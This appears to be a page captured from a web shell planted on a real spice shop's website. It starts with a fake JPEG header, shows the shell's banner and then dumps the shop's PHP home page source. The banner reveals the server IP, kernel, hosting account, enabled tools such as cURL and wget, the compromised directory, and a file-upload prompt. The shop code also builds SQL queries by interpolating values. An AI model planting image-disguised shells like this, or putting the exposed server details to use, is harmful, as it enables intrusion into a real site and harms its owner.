���� JFIF fdasasfas213sdaf
Server IP : 77.37.115.250 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/saumasale.in/public_html/images/ |
Upload File : |
<?php include('function.php'); $url = 'https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; head( 'S & A Foods and Spices ', 'S & A Foods and Spices ', 'S & A Foods and Spices ', $url ); // $ob = new database(); ?> <div class="ban_bg"> <div class="header_bg"> <div class="left"> <img src="assets/images/logo1.png" alt="SAU MASALA"> <h1>SAU MASALA</h1> </div> </div> <div class="banner_3d"> <div class="product_3d"> <div class="soda_3d" style="--url: url(images/bg.png)"> </div> <div class="soda_3d" style="--url: url(images/bg2.png)"> </div> </div> <div class="rock_3d"> <img src="images/rock1.png" alt=""> </div> </div> </div> <!--================= Product Category Section Start Here =================--> <div class="rts-product-category-section section-gap"> <div class="container"> <div class="row"> <div class="col-xl-2"> <a href="product.php?id=69" class="product-item product-item-vertical"> <div class="product-thumb"><img src="images/mix.jpg" style="width: 110px;"></div> <div class="contents"> <span class="item-qnty">10 Items</span> <h3 class="product-title">Special Mix Masale </h3> </div> </a> </div> <div class="col-xl-8"> <div class="row"> <div class="col-xl-4 col-md-6 col-sm-6"> <a href="product.php?id=71" class="product-item product-item-horizontal"> <div class="product-thumb"><img src="images/chutney.jpg" alt="product-image"></div> <div class="contents"> <span class="item-qnty">10 Items</span> <h3 class="product-title">Chutney</h3> </div> </a> </div> <div class="col-xl-4 col-md-6 col-sm-6"> <a href="product.php?id=72" class="product-item product-item-horizontal"> <div class="product-thumb"><img src="images/dry-fruits.png" alt="product-image"></div> <div class="contents"> <span class="item-qnty">10 Items</span> <h3 class="product-title">Dry Fruits</h3> </div> </a> </div> <div class="col-xl-4 col-md-6 col-sm-6"> <a href="product.php?id=73" class="product-item product-item-horizontal"> <div class="product-thumb"><img src="images/cinnamon.jpg" alt="product-image"></div> <div class="contents"> <span class="item-qnty">10 Items</span> <h3 class="product-title">Whole Spices</h3> </div> </a> </div> <div class="col-xl-4 col-md-6 col-sm-6"> <a href="product.php?id=74" class="product-item product-item-horizontal"> <div class="product-thumb"><img src="images/ladoo.gif" alt="product-image"></div> <div class="contents"> <span class="item-qnty">10 Items</span> <h3 class="product-title">Ladoo</h3> </div> </a> </div> <div class="col-xl-4 col-md-6 col-sm-6"> <a href="product.php?id=75" class="product-item product-item-horizontal"> <div class="product-thumb"><img src="images/farsan.png" alt="product-image"></div> <div class="contents"> <span class="item-qnty">10 Items</span> <h3 class="product-title">Farsan</h3> </div> </a> </div> <div class="col-xl-4 col-md-6 col-sm-6"> <a href="product.php" class="product-item product-item-horizontal"> <div class="product-thumb"><img src="images/garam.jpg" alt="product-image"></div> <div class="contents"> <span class="item-qnty">1 Items</span> <h3 class="product-title">Sau Spl. <br />Garam Masala</h3> </div> </a> </div> </div> </div> <div class="col-lg-2 col-md-12"> <a href="product.php?id=70" class="product-item product-item-vertical product-item-bg"> <div class="product-thumb"><img src="images/spice.jpg" style="width: 128px;"></div> <div class="contents"> <span class="item-qnty mb-2">Organic Spices</span> <h3 class="product-title">Daily Use Spices</h3> </div> </a> </div> </div> </div> </div> <!--================= Product Category Section End Here =================--> <!--================= Ad Banner Section Start Here =================--> <div class="rts-ad-banner-section section-space"> <div class="container"> <div class="ad-banner-inner"> <div class="ad-banner mr--20"><img src="images/sau.jpg" alt="ad"></div> <div class="ad-banner"><img src="images/banner2.jpg" alt="ad"></div> </div> </div> </div> <!--================= Ad Banner Section End Here =================--> <!--================= Product Category Section Start Here =================--> <div class="rts-featured-product-section rts-featured-product-section2 section-gap"> <div class="container"> <div class="section-header section-header4"> <span class="section-title section-title-2 mb--5 ">Feature Products</span> <a href="product.php" class="go-btn">All Products <i class="fal fa-long-arrow-right"></i></a> </div> <div class="row justify-content-center"> <?php $ob = new database(); $ob->query("SELECT * FROM product ORDER BY RAND() LIMIT 10"); if ($ob->affected_rows() >= 1) { foreach ($ob->rows() as $cat) { $id = $cat['id']; $title = $cat['title']; $cat_id = $cat['category']; $rand = (rand(10,20)); $old_price = $cat['price'] * "1.$rand"; $x = str_replace(" ", "-", "$title"); ?> <div class="col-lg-15 col-md-4 col-sm-6"> <div class="product-item"> <div class="product-status-bar"> <div class="rating-stars-group"> <div class="rating-star"><i class="fas fa-star"></i></div> <div class="rating-star"><i class="fas fa-star"></i></div> <div class="rating-star"><i class="fas fa-star"></i></div> <div class="rating-star"><i class="fas fa-star"></i></div> <div class="rating-star"><i class="fas fa-star"></i></div> </div> <span class="stock"> <?php $avaiability = $cat['avaiability']; if ($avaiability == 1) { echo "In Stock"; } else { echo "Out of Stock"; } ?> </span> </div> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>" class="product-thumb img_thu"> <img src="admin/<?php echo $cat['image']; ?>" alt="<?php echo $title; ?>"> </a> <div class="contents"> <span class="product-type"> <?php $ob->query("SELECT * FROM category where id='$cat_id'"); if ($ob->affected_rows() >= 1) { foreach ($ob->rows() as $data1) { ?> <?php echo $data1['category']; ?> <?php } } ?> </span> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>" class="product-title"><?php echo $title; ?></a> <div class="product-bottom-content"> <span class="product-price">₹ <?php echo $cat['price']; ?>.00 <span class="old-price">₹ <?php echo round($old_price); ?>.00</span></span> <button class="wishlist"><i class="rt-heart"></i></button> </div> </div> <div class="product-features product-features3"> <div class="discount-tag product-tag">-<?php echo $rand;?>%</div> </div> <div class="product-bottom-action"> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>" class="addto-cart"><i class="fal fa-shopping-bag mr--5"></i> See More</a> <button class="view-btn"><i class="fal fa-eye"></i></button> </div> </div> </div> <?php } } ?> </div> </div> </div> <!--================= Product Category Section End Here =================--> <!--================= Box Catagory Section Start Here =================--> <div class="rts-box-catagory-section"> <div class="box-catagory-inner"> <div class="row"> <div class="col-xl-3 col-md-6 col-sm-6"> <div class="catagory-box box1"> <a href="category.php" class="picture"> <img src="images/ban1.jpg" alt="box-picture"> </a> <a href="product.php" class="view-collection-btn">View Collection</a> <div class="contents"> <div class="icon"><img src="images/bowl.png" alt="" style="width:70px;"></div> <h2 class="box-heading">Premium Quality Ingredients</h2> </div> <span class="item-update">100 New Added</span> </div> </div> <div class="col-xl-3 col-md-6 col-sm-6"> <div class="catagory-box box2"> <a href="category.php" class="picture"><img src="images/hygienically.png" alt="box-picture"></a> <a href="category.php" class="view-collection-btn">View Collection</a> <div class="contents"> <div class="icon"><img src="images/hy.png" alt="" style="width:70px;"></div> <h2 class="box-heading">Hygienically Prepared</h2> </div> <span class="item-update">100 New Added</span> </div> </div> <div class="col-xl-3 col-md-6 col-sm-6"> <div class="catagory-box box3"> <a href="category.php" class="picture"><img src="images/no-preseratives.jpg" alt="box-picture"></a> <a href="category.php" class="view-collection-btn">View Collection</a> <div class="contents"> <div class="icon"><img src="images/no.png" alt="" style="width:70px;"></div> <h2 class="box-heading">No Preseratives</h2> </div> <span class="item-update">100 New Added</span> </div> </div> <div class="col-xl-3 col-md-6 col-sm-6"> <div class="catagory-box box4 last-child"> <a href="category.php" class="picture"><img src="images/hand-made.jpg" alt="box-picture"></a> <a href="category.php" class="view-collection-btn">View Collection</a> <div class="contents"> <div class="icon"><img src="images/hand-made.png" style="width:70px;"></div> <h2 class="box-heading">Hand Made Products</h2> </div> <span class="item-update">100 New Added</span> </div> </div> </div> </div> </div> <!--================= Box Catagory Section End Here =================--> <!--================= Video Section Start Here =================--> <div class="rts-video-section"> <div class="container" style="max-width: 100% !important;padding: 0px;"> <div class="video-section-inner"> <div class="rts-video"> <div class="about-video-wrapper"> <a href="https://www.youtube.com/watch?v=3slwGLO38wo" class="popup-videos"> <i class="rt-play"></i> </a> </div> </div> </div> </div> </div> <!--================= Video Section End Here =================--> <!--================= Feeds Section Start Here =================--> <div class="rts-top-listed-items"> <div class="rts-new-collection-section section9"> <div class="container"> <div class="section-inner"> <div class="section-header section-header3 section-header9 text-center"> <div class="wrapper"> <div class="sub-content"> <img class="line-1" src="assets/images/banner/wvbo-icon.png" alt=""> <span class="sub-text">Sau Masale</span> <img class="line-2" src="assets/images/banner/wvbo-icon.png" alt=""> </div> <h2 class="title">HOT SELLING PRODUCTS</h2> </div> </div> <div class="swiper rts-cmmnSlider-over swiper-initialized swiper-horizontal swiper-pointer-events" data-swiper="pagination"> <div class="swiper-wrapper" id="swiper-wrapper-6c68373dd460a459" aria-live="off" style="transform: translate3d(-2145px, 0px, 0px); transition-duration: 0ms;"> <?php $ob = new database(); $ob->query("SELECT * FROM product ORDER BY RAND() LIMIT 10"); if ($ob->affected_rows() >= 1) { foreach ($ob->rows() as $cat) { $id = $cat['id']; $title = $cat['title']; $cat_id = $cat['category']; $rand = (rand(10,20)); $old_price = $cat['price'] * "1.$rand"; $x = str_replace(" ", "-", "$title"); ?> <div class="swiper-slide" role="group" style="width: 327.5px; margin-right: 30px;"> <div class="collection-item"> <div class="image"> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>"><img src="admin/<?php echo $cat['image']; ?>" alt="<?php echo $title; ?>"></a> </div> <div class="contents"> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>" class="item-catagory-box"> <h3 class="title"><?php echo $title; ?></h3> </a> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>" class="shop-btn">See Now</a> </div> </div> </div> <?php } } ?> </div> <span class="swiper-notification" aria-live="assertive" aria-atomic="true"></span> </div> </div> </div> </div> <div class="container"> <div class="section-inner"> <div class="row"> <div class="col-xl-9 col-lg-8 col-md-6 col-sm-12 pr"> <div class="content-topbar"> <h3 class="heading">Top Listed Items</h3> <a href="#" class="view-btn">View All <i class="rt-arrow-right-long"></i></a> </div> <div class="row justify-content-lg-center"> <?php $ob->query("SELECT * FROM product ORDER BY RAND() LIMIT 9"); if ($ob->affected_rows() >= 1) { foreach ($ob->rows() as $cat) { $id = $cat['id']; $title = $cat['title']; $cat_id = $cat['category']; $rand = (rand(10,20)); $old_price = $cat['price'] * "1.$rand"; $x = str_replace(" ", "-", "$title"); ?> <div class="col-xl-4 col-lg-6 col-md-6 col-sm-4 col-6 border-bottom p-0"> <div class="wraper"> <div class="image-section img1"> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>"><img src="admin/<?php echo $cat['image']; ?>" alt="<?php echo $title; ?>"></a> </div> <div class="content"> <div class="star-rating"> <ul> <li><a href="#" class="fill" style="position: relative; height: 0px;"><i class="fas fa-star"></i></a></li> <li><a href="#" class="fill" style="position: relative; height: 0px;"><i class="fas fa-star"></i></a></li> <li><a href="#" class="fill" style="position: relative; height: 0px;"><i class="fas fa-star"></i></a></li> <li><a href="#" class="fill" style="position: relative; height: 0px;"><i class="fas fa-star"></i></a></li> <li><a href="#" class="fill" style="position: relative; height: 0px;"><i class="fas fa-star"></i></a></li> </ul> <span>(10)</span> </div> <a href="product-details.php?id=<?php echo base64_encode($cat['id']); ?>&url=<?php echo $x; ?>" class="product-title"><?php echo $title; ?></a> <p class="product-price">₹ <?php echo $cat['price']; ?>.00</p> </div> </div> </div> <?php } } ?> </div> </div> <div class="col-xl-3 col-lg-4 col-md-6 col-sm-12 p-0"> <div class="right-side-banner"> <img src="images/side.jpg" alt=""> </div> </div> </div> </div> </div> </div> <!--================= Top Listed Section End Here =================--> <!--================= Brand Section Start Here =================--> <div class="rts-brands-section1 section9 brand-bg3"> <div class="glass"> <div class="container"> <div class="row align-items-center"> <div class="col-lg-12"> <div class="slider-div"> <div class="swiper rts-brandSlide1"> <div class="swiper-wrapper"> </div> </div> </div> </div> </div> </div> </div> </div> <?php foter(); ?>